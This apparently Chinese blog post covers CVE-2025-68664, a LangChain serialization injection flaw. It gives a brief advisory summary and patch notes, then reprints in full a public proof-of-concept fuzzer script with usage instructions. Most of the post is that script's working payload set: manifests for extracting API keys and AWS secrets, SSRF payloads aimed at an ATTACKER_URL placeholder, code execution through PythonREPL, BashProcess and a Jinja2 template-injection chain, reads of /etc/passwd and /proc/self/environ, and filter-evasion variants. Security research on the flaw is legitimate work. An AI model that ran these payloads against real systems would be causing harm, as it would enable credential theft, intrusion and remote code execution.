LangChain序列化注入漏洞允许在转储/加载API中提取秘密(CVE-2025-68664)

总结

LangChain的dumps()dumpd()函数中存在序列化注入漏洞。当序列化自由格式的字典时,这些函数不会用'lc'键转义字典。LangChain内部使用'lc'键来标记序列化的对象。当用户控制的数据包含此键结构时,它在数据化过程中被视为合法的LangChain对象,而不是普通的用户数据。

攻击面

核心漏洞在dumps()dumpd()中:这些函数无法逃脱包含'lc'键的用户控制字典。当这些未转义的数据后来通过load()loads()被格式化时,注入的结构被视为合法的LangChain对象,而不是普通的用户数据。

这个逃逸的bug启用了几个攻击向量:

  1. 通过用户数据注入:恶意LangChain对象结构可以通过用户控制的字段(如metadataadditional_kwargsresponse_metadata)注入。
  2. 受信任命名空间内的类实例化:注入的清单可以实例化任何Serializable子类,但只能在预先批准的受信任命名空间(langchain_corelangchainlangchain_community)内。这包括__init__中有副作用的类(网络调用,文件操作等)。请注意,在此补丁之前已经强制执行了名称空间验证,因此无法实例化这些受信任名称空间之外的任意类。

安全加固

此补丁修复了dumps()dumpd()中的逃逸错误,并在load()loads()中引入了新的限制性默认值:通过allowed_objects="core"执行allowlist(仅限于序列化映射),secrets_from_envTrue更改为False,并通过init_validator默认Jinja 2模板阻止。这些是一些用例的突破性变化。

详细文章https://github.com/advisories/GHSA-c67j-w6g6-q2cm


POC

https://github.com/Ak-cybe/CVE-2025-68664-LangGrinch-PoC

langgrinch_fuzzer.py

#!/usr/bin/env python3
"""
🎯 LangGrinch Fuzzer - CVE-2025-68664 Payload Generator & Tester
================================================================

This tool generates and tests LangChain deserialization injection payloads
for authorized security testing purposes only.

Author: Amresh Kumar (Ak-cybe)
CVE: CVE-2025-68664

⚠️ WARNING: Use only on systems you own or have explicit permission to test!
"""

import json
import argparse
import sys
from typing import List, Dict, Any
from dataclasses import dataclass
from enum import Enum


class PayloadCategory(Enum):
    """Payload categories for organized testing"""
    RECON = "reconnaissance"
    SSRF = "ssrf"
    RCE = "rce"
    FILE_READ = "file_read"
    EVASION = "evasion"


@dataclass
class Payload:
    """Represents a single exploit payload"""
    name: str
    category: PayloadCategory
    payload: Dict[str, Any]
    description: str
    risk_level: str  # low, medium, high, critical


class LangGrinchFuzzer:
    """
    LangGrinch Fuzzer - Generate and test CVE-2025-68664 payloads
    """
    
    def __init__(self):
        self.payloads: List[Payload] = []
        self._load_payloads()
    
    def _load_payloads(self):
        """Load all payload definitions"""
        
        # ========== RECONNAISSANCE PAYLOADS ==========
        recon_secrets = [
            ("HOSTNAME", "Server hostname"),
            ("OPENAI_API_KEY", "OpenAI API key"),
            ("AWS_ACCESS_KEY_ID", "AWS access key"),
            ("AWS_SECRET_ACCESS_KEY", "AWS secret key"),
            ("DATABASE_URL", "Database connection string"),
            ("REDIS_URL", "Redis connection URL"),
            ("ANTHROPIC_API_KEY", "Anthropic API key"),
            ("GOOGLE_API_KEY", "Google API key"),
            ("PINECONE_API_KEY", "Pinecone API key"),
            ("HUGGINGFACE_API_TOKEN", "HuggingFace token"),
            ("LANGCHAIN_API_KEY", "LangChain API key"),
            ("PATH", "System PATH variable"),
            ("HOME", "Home directory"),
            ("USER", "Current user"),
            ("JWT_SECRET", "JWT secret key"),
        ]
        
        for env_var, desc in recon_secrets:
            self.payloads.append(Payload(
                name=f"Secret Extraction: {env_var}",
                category=PayloadCategory.RECON,
                payload={"lc": 1, "type": "secret", "id": [env_var]},
                description=f"Extract {desc} from environment",
                risk_level="medium"
            ))
        
        # Error trigger for stack trace leak
        self.payloads.append(Payload(
            name="Error Trigger (Stack Trace Leak)",
            category=PayloadCategory.RECON,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain", "non_existent_module", "FakeClass"],
                "kwargs": {}
            },
            description="Trigger error to leak version info in stack trace",
            risk_level="low"
        ))
        
        # ========== SSRF PAYLOADS ==========
        ssrf_payloads = [
            {
                "name": "RequestsWrapper SSRF",
                "id": ["langchain_community", "utilities", "requests", "RequestsWrapper"],
                "kwargs": {"headers": {"X-Injected": "true"}}
            },
            {
                "name": "OpenAI Base URL Override",
                "id": ["langchain_community", "llms", "openai", "OpenAI"],
                "kwargs": {"openai_api_base": "http://ATTACKER_URL/", "openai_api_key": "sk-fake"}
            },
            {
                "name": "HuggingFace Endpoint",
                "id": ["langchain_community", "llms", "huggingface_endpoint", "HuggingFaceEndpoint"],
                "kwargs": {"endpoint_url": "http://ATTACKER_URL/webhook"}
            },
            {
                "name": "WebBaseLoader SSRF",
                "id": ["langchain_community", "document_loaders", "web_base", "WebBaseLoader"],
                "kwargs": {"web_path": "http://ATTACKER_URL/ssrf"}
            },
            {
                "name": "Ollama Base URL",
                "id": ["langchain_community", "llms", "ollama", "Ollama"],
                "kwargs": {"base_url": "http://ATTACKER_URL/ollama"}
            },
        ]
        
        for ssrf in ssrf_payloads:
            self.payloads.append(Payload(
                name=ssrf["name"],
                category=PayloadCategory.SSRF,
                payload={
                    "lc": 1,
                    "type": "constructor",
                    "id": ssrf["id"],
                    "kwargs": ssrf["kwargs"]
                },
                description=f"SSRF via {ssrf['name']}",
                risk_level="high"
            ))
        
        # ========== RCE PAYLOADS ==========
        self.payloads.append(Payload(
            name="PythonREPL (Critical)",
            category=PayloadCategory.RCE,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain_experimental", "utilities", "python", "PythonREPL"],
                "kwargs": {}
            },
            description="Direct Python code execution via REPL",
            risk_level="critical"
        ))
        
        self.payloads.append(Payload(
            name="Jinja2 SSTI - Command Execution",
            category=PayloadCategory.RCE,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain_core", "prompts", "prompt", "PromptTemplate"],
                "kwargs": {
                    "template": "{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}",
                    "template_format": "jinja2"
                }
            },
            description="SSTI leading to OS command execution",
            risk_level="critical"
        ))
        
        self.payloads.append(Payload(
            name="BashProcess Execution",
            category=PayloadCategory.RCE,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain_experimental", "llm_bash", "bash", "BashProcess"],
                "kwargs": {}
            },
            description="Bash command execution",
            risk_level="critical"
        ))
        
        # ========== FILE READ PAYLOADS ==========
        file_read_payloads = [
            {
                "name": "CSVLoader - /etc/passwd",
                "id": ["langchain_community", "document_loaders", "csv_loader", "CSVLoader"],
                "kwargs": {"file_path": "/etc/passwd"}
            },
            {
                "name": "TextLoader - /proc/self/environ",
                "id": ["langchain_community", "document_loaders", "text", "TextLoader"],
                "kwargs": {"file_path": "/proc/self/environ"}
            },
            {
                "name": "JSONLoader - Config",
                "id": ["langchain_community", "document_loaders", "json_loader", "JSONLoader"],
                "kwargs": {"file_path": "/app/config.json", "jq_schema": "."}
            },
        ]
        
        for fr in file_read_payloads:
            self.payloads.append(Payload(
                name=fr["name"],
                category=PayloadCategory.FILE_READ,
                payload={
                    "lc": 1,
                    "type": "constructor",
                    "id": fr["id"],
                    "kwargs": fr["kwargs"]
                },
                description=f"Read file via {fr['name']}",
                risk_level="high"
            ))
        
        # ========== EVASION PAYLOADS ==========
        self.payloads.append(Payload(
            name="Nested Injection",
            category=PayloadCategory.EVASION,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain", "schema", "HumanMessage"],
                "kwargs": {
                    "content": "normal text",
                    "additional_kwargs": {
                        "hidden": {"lc": 1, "type": "secret", "id": ["SECRET_KEY"]}
                    }
                }
            },
            description="Hide payload in nested structure to bypass filters",
            risk_level="medium"
        ))
        
        self.payloads.append(Payload(
            name="Unicode Bypass",
            category=PayloadCategory.EVASION,
            payload={"\u006c\u0063": 1, "type": "secret", "id": ["API_KEY"]},
            description="Use unicode encoding to bypass simple filters",
            risk_level="medium"
        ))
    
    def get_payloads_by_category(self, category: PayloadCategory) -> List[Payload]:
        """Get all payloads of a specific category"""
        return [p for p in self.payloads if p.category == category]
    
    def get_all_payloads(self) -> List[Payload]:
        """Get all payloads"""
        return self.payloads
    
    def generate_payload_json(self, payload: Payload, pretty: bool = True) -> str:
        """Generate JSON string for a payload"""
        if pretty:
            return json.dumps(payload.payload, indent=2)
        return json.dumps(payload.payload)
    
    def export_all_payloads(self, output_file: str = None) -> str:
        """Export all payloads to JSON"""
        export_data = []
        for p in self.payloads:
            export_data.append({
                "name": p.name,
                "category": p.category.value,
                "risk_level": p.risk_level,
                "description": p.description,
                "payload": p.payload
            })
        
        json_output = json.dumps(export_data, indent=2)
        
        if output_file:
            with open(output_file, 'w') as f:
                f.write(json_output)
            print(f"✅ Exported {len(export_data)} payloads to {output_file}")
        
        return json_output
    
    def generate_custom_secret_payload(self, env_var: str) -> Dict[str, Any]:
        """Generate a custom secret extraction payload"""
        return {"lc": 1, "type": "secret", "id": [env_var]}
    
    def generate_custom_ssrf_payload(self, target_url: str) -> Dict[str, Any]:
        """Generate a custom SSRF payload"""
        return {
            "lc": 1,
            "type": "constructor",
            "id": ["langchain_community", "utilities", "requests", "RequestsWrapper"],
            "kwargs": {"headers": {"X-Target": target_url}}
        }


def print_banner():
    """Print the tool banner"""
    banner = """
╔═══════════════════════════════════════════════════════════════════╗
║                                                                   ║
║   ██╗      █████╗ ███╗   ██╗ ██████╗  ██████╗ ██████╗ ██╗███╗   ██║
║   ██║     ██╔══██╗████╗  ██║██╔════╝ ██╔════╝ ██╔══██╗██║████╗  ██║
║   ██║     ███████║██╔██╗ ██║██║  ███╗██║  ███╗██████╔╝██║██╔██╗ ██║
║   ██║     ██╔══██║██║╚██╗██║██║   ██║██║   ██║██╔══██╗██║██║╚██╗██║
║   ███████╗██║  ██║██║ ╚████║╚██████╔╝╚██████╔╝██║  ██║██║██║ ╚████║
║   ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝
║                                                                   ║
║           🎯 LangGrinch Fuzzer - CVE-2025-68664                   ║
║           📝 Author: Amresh Kumar (Ak-cybe)                       ║
║                                                                   ║
╚═══════════════════════════════════════════════════════════════════╝
    """
    print(banner)


def main():
    """Main entry point"""
    print_banner()
    
    parser = argparse.ArgumentParser(
        description="LangGrinch Fuzzer - CVE-2025-68664 Payload Generator",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python langgrinch_fuzzer.py --list                    # List all payloads
  python langgrinch_fuzzer.py --category recon          # Show recon payloads
  python langgrinch_fuzzer.py --export payloads.json    # Export all payloads
  python langgrinch_fuzzer.py --secret MY_API_KEY       # Generate custom secret payload
  python langgrinch_fuzzer.py --ssrf http://webhook.site/xxx  # Generate SSRF payload
        """
    )
    
    parser.add_argument('--list', '-l', action='store_true', 
                        help='List all available payloads')
    parser.add_argument('--category', '-c', type=str,
                        choices=['recon', 'ssrf', 'rce', 'file_read', 'evasion'],
                        help='Filter by payload category')
    parser.add_argument('--export', '-e', type=str,
                        help='Export all payloads to JSON file')
    parser.add_argument('--secret', '-s', type=str,
                        help='Generate custom secret extraction payload')
    parser.add_argument('--ssrf', type=str,
                        help='Generate custom SSRF payload with target URL')
    parser.add_argument('--json', '-j', action='store_true',
                        help='Output in JSON format only (no formatting)')
    
    args = parser.parse_args()
    
    fuzzer = LangGrinchFuzzer()
    
    if args.list:
        print("\n📋 Available Payloads:\n")
        print("-" * 80)
        for i, p in enumerate(fuzzer.get_all_payloads(), 1):
            risk_emoji = {"low": "🟢", "medium": "🟡", "high": "🟠", "critical": "🔴"}
            print(f"{i:2}. [{risk_emoji.get(p.risk_level, '⚪')} {p.risk_level.upper():8}] "
                  f"[{p.category.value:12}] {p.name}")
        print("-" * 80)
        print(f"\n✅ Total: {len(fuzzer.get_all_payloads())} payloads")
        return
    
    if args.category:
        category_map = {
            'recon': PayloadCategory.RECON,
            'ssrf': PayloadCategory.SSRF,
            'rce': PayloadCategory.RCE,
            'file_read': PayloadCategory.FILE_READ,
            'evasion': PayloadCategory.EVASION
        }
        category = category_map[args.category]
        payloads = fuzzer.get_payloads_by_category(category)
        
        print(f"\n📋 {category.value.upper()} Payloads:\n")
        print("-" * 80)
        for p in payloads:
            print(f"\n🎯 {p.name}")
            print(f"   Description: {p.description}")
            print(f"   Risk Level: {p.risk_level}")
            print(f"   Payload:")
            print(fuzzer.generate_payload_json(p))
        print("-" * 80)
        return
    
    if args.export:
        fuzzer.export_all_payloads(args.export)
        return
    
    if args.secret:
        payload = fuzzer.generate_custom_secret_payload(args.secret)
        if args.json:
            print(json.dumps(payload))
        else:
            print(f"\n🔑 Custom Secret Extraction Payload for: {args.secret}\n")
            print(json.dumps(payload, indent=2))
        return
    
    if args.ssrf:
        payload = fuzzer.generate_custom_ssrf_payload(args.ssrf)
        if args.json:
            print(json.dumps(payload))
        else:
            print(f"\n🌐 Custom SSRF Payload for: {args.ssrf}\n")
            print(json.dumps(payload, indent=2))
        return
    
    # Default: show help
    parser.print_help()


if __name__ == "__main__":
    main()

📂 Project Structure

LangGrinch-PoC/
│
├── README.md              # Main documentation & writeup
├── PAYLOADS.md            # Complete payload arsenal (55+)
├── langgrinch_fuzzer.py   # Python payload generator & tester
├── requirements.txt       # Python dependencies
└── LICENSE                # MIT License

🚀 Quick Start

Installation

# Clone the repository
git clone https://github.com/Ak-cybe/LangGrinch-PoC.git
cd LangGrinch-PoC

# Install dependencies
pip install -r requirements.txt

Usage

# List all available payloads
python langgrinch_fuzzer.py --list

# Show payloads by category
python langgrinch_fuzzer.py --category recon
python langgrinch_fuzzer.py --category ssrf
python langgrinch_fuzzer.py --category rce

# Generate custom secret extraction payload
python langgrinch_fuzzer.py --secret MY_API_KEY

# Generate custom SSRF payload
python langgrinch_fuzzer.py --ssrf http://your-webhook.com/

# Export all payloads to JSON
python langgrinch_fuzzer.py --export payloads.json

CVE-2025-68664(代号:LangGrinch)是在LangChain Core Python包中发现的严重序列化注入漏洞。此漏洞允许攻击者通过LLM输出或用户控制的字典注入恶意lc标记,从而:

  1. 🔑环境秘密提取(API密钥、DB密码)
  2. SSRF攻击(攻击内部服务)
  3. 💀远程代码执行(通过Jinja2 SSTI链)
  4. 文件系统访问(阅读敏感文件)

© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容